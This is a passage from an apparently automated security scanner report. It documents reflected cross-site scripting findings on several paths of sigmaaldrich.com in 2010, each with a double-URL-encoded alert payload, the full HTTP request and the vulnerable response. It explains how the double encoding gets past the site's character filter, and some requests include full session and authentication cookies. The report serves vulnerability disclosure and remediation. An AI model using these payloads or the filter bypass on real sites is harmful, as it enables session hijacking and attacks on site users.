The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 594ca%2522%253balert%25281%2529%252f%252fb6042505d08 was submitted in the REST URL parameter 1. This input was echoed as 594ca";alert(1)//b6042505d08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science594ca%2522%253balert%25281%2529%252f%252fb6042505d08/renewable-alternative-energy.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science594ca";alert(1)//b6042505d08/renewable-alternative-energy.html","E404") ;
   </script>
...[SNIP]...

1.603. http://www.sigmaaldrich.com/safc-global/en-us/home.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /safc-global/en-us/home.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f65f%2522%253balert%25281%2529%252f%252f4ba4f311f57 was submitted in the REST URL parameter 1. This input was echoed as 9f65f";alert(1)//4ba4f311f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /9f65f%2522%253balert%25281%2529%252f%252f4ba4f311f57/en-us/home.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28920
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/9f65f";alert(1)//4ba4f311f57/en-us/home.html","E404") ;
   </script>
...[SNIP]...

1.604. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f58d9%2522%253balert%25281%2529%252f%252f321e593d89b was submitted in the REST URL parameter 1. This input was echoed as f58d9";alert(1)//321e593d89b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrichf58d9%2522%253balert%25281%2529%252f%252f321e593d89b/help/help-welcome/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrichf58d9";alert(1)//321e593d89b/help/help-welcome/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.605. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc6c7%2522%253balert%25281%2529%252f%252f7f7383024f7 was submitted in the REST URL parameter 2. This input was echoed as bc6c7";alert(1)//7f7383024f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/helpbc6c7%2522%253balert%25281%2529%252f%252f7f7383024f7/help-welcome/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:18 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/helpbc6c7";alert(1)//7f7383024f7/help-welcome/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.606. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c43%2522%253balert%25281%2529%252f%252ffed4d24df0f was submitted in the REST URL parameter 3. This input was echoed as e2c43";alert(1)//fed4d24df0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcomee2c43%2522%253balert%25281%2529%252f%252ffed4d24df0f/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcomee2c43";alert(1)//fed4d24df0f/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.607. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420be%2522%253balert%25281%2529%252f%252f1a0531a0d8a was submitted in the REST URL parameter 4. This input was echoed as 420be";alert(1)//1a0531a0d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product420be%2522%253balert%25281%2529%252f%252f1a0531a0d8a/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:21 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product420be";alert(1)//1a0531a0d8a/favorites.html","E404") ;
   </script>
...[SNIP]...

1.608. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62562%2522%253balert%25281%2529%252f%252fabedcc9514b was submitted in the REST URL parameter 5. This input was echoed as 62562";alert(1)//abedcc9514b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product/62562%2522%253balert%25281%2529%252f%252fabedcc9514b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
